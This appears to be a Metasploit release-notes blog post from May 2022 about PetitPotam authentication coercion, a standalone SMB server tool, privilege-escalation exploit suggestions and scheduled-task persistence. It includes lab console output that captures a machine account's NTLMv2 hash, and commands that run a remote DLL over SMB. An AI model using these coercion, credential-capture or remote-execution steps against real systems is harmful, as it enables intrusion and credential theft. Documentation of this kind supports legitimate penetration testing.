Last updated at Fri, 27 May 2022 19:30:31 GMT

PetitPotam Improvements

Metasploit’s Ruby support has been updated to allow anonymous authentication to SMB servers. This is notably useful while exploiting the PetitPotam vulnerability with Metasploit, which can be used to coerce a Domain Controller to send an authentication attempt over SMB to other machines via MS-EFSRPC methods:

msf6 auxiliary(scanner/dcerpc/petitpotam) > run 192.168.159.10

[*] 192.168.159.10:445    - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445    - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcOpenFileRaw

[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.159.10
[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:768ec6a80487d57b:c5bae280991f0814f92bbbd5cce710df:0101000000000000806cc79fb364d801fed140b07186c36f000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f005500500007000800806cc79fb364d80106000400020000000800300030000000000000000000000000400000ee85f088ff3d462c936ca209ddc2cc835a9df7261cf96264158f81bf31035a980a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100350039002e003100320038000000000000000000

[+] 192.168.159.10:445    - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >

Full details can be found in the Metasploit PetitPotam documentation.

Standalone SMB Server tool

Our very own Spencer McIntyre has added support for creating a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB 1/2/3, as well as encryption support for SMB3.

Example usage:

ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point .

This can be useful for copying files onto remote targets, or running remote DLLs:

copy \\192.168.123.1\home\example.txt .

rundll32.exe \\192.168.123.1\home\example.dll,0

Local Exploit suggester improvements

The post/multi/recon/local_exploit_suggester module is a post-exploitation module which iterates through multiple relevant Metasploit modules and automatically checks for local vulnerabilities that may lead to privilege escalation.

This module has been updated with a number of bug fixes, as well as having the UX has been improved to more clearly highlight which modules are viable:

msf6 post(multi/recon/local_exploit_suggester) > run session=-1
... etc ...
[*] ::1 - Valid modules for session 3:
============================
 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                 Yes                      The target is vulnerable.
 2   exploit/linux/local/cve_2022_0847_dirtypipe                         Yes                      The target appears to be vulnerable. Linux kernel version found: 5.14.0
 3   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.
 4   exploit/linux/local/desktop_privilege_escalation                    Yes                      The target is vulnerable.
 5   exploit/linux/local/network_manager_vpnc_username_priv_esc          Yes                      The service is running, but could not be validated.
 6   exploit/linux/local/pkexec                                          Yes                      The service is running, but could not be validated.
 7   exploit/linux/local/polkit_dbus_auth_bypass                         Yes                      The service is running, but could not be validated. Detected polkit framework version 0.105.
 8   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 9   exploit/android/local/futex_requeue                                 No                       The check raised an exception.
 10  exploit/linux/local/abrt_raceabrt_priv_esc                          No                       The target is not exploitable.
 11  exploit/linux/local/abrt_sosreport_priv_esc                         No                       The target is not exploitable.
 12  exploit/linux/local/af_packet_chocobo_root_priv_esc                 No                       The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable
 13  exploit/linux/local/af_packet_packet_set_ring_priv_esc              No                       The target is not exploitable.
 14  exploit/linux/local/apport_abrt_chroot_priv_esc                     No                       The target is not exploitable.
 15  exploit/linux/local/asan_suid_executable_priv_esc                   No                       The check raised an exception.
 16  exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc          No                       The target is not exploitable.

Setting the option verbose=true will now also highlight modules that weren’t considered as part of the module suggestion phase - due to session platform/arch/type mismatches. This is useful for evaluating modules which may require manually migrating from a Shell session to Meterpreter, or from a Python Meterpreter to a Native Meterpreter to gain local privilege escalation etc.

New module content (1)

  • #16488 from cdelafuente-r7 - This updates the exploit/windows/local/vss_persistence and post/windows/manage/persistence_exe modules to optionally obfuscate scheduled tasks. Additionally, the post/windows/manage/persistence_exe was updated with a new "TASK" startup technique that allows users to obtain persistence via a scheduled task.

Enhancements and features (7)

  • #16413 from sjanusz-r7 - Updates the multi/recon/local_exploit_suggester with multiple enhancements, including the ability to correctly work with Java/Python Meterpreters as well as now generating a readable table of results.
  • #16481 from zeroSteiner - This updates the Msf::Exploit::Remote::SMB::Server::Share mixin to use RubySMB, which now supports SMB versions 1-3, along with various other features like accounting, state logging, session tracking, support for multiple files etc. All existing modules that were using this mixin will now automatically benefit from these improvements. They will work again against modern versions of Windows where SMBv1 has been disabled.
  • #16518 from adfoster-r7 - Merge Metasploit framework wiki into Metasploit framework.
  • #16600 from adfoster-r7 - Update docs site to use migrated wiki files.
  • #16610 from zeroSteiner - Updates the module windows/dcerpc/cve_2021_1675_printnightmare from being an auxiliary that would require the user to setup and configure an external Samba share to host the payload to an all-inclusive exploit. This means users can deliver their payloads in a seamless fashion without needing to deal with Samba.
  • #16620 from zeroSteiner - Adds a standalone tool for creating a read-only SMB 2/3 server from the current working directory. Usage: ruby ./tools/smb_file_server.rb. Normal SMB clients can then connect to this share and download files as normal. For instance via Windows with copy \\192.168.123.1\home\example.exe . or net use \\192.168.123.1\home /u:WORKGROUP\metasploit password

Bugs fixed (1)

  • #16619 from NikitaKovaljov - This fixes a bug in neighbor advertisement filtering as used by the auxiliary/scanner/discover/ipv6_neighbor module. Prior to this patch, the module would fail to map IPv4 to IPv6 addresses.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).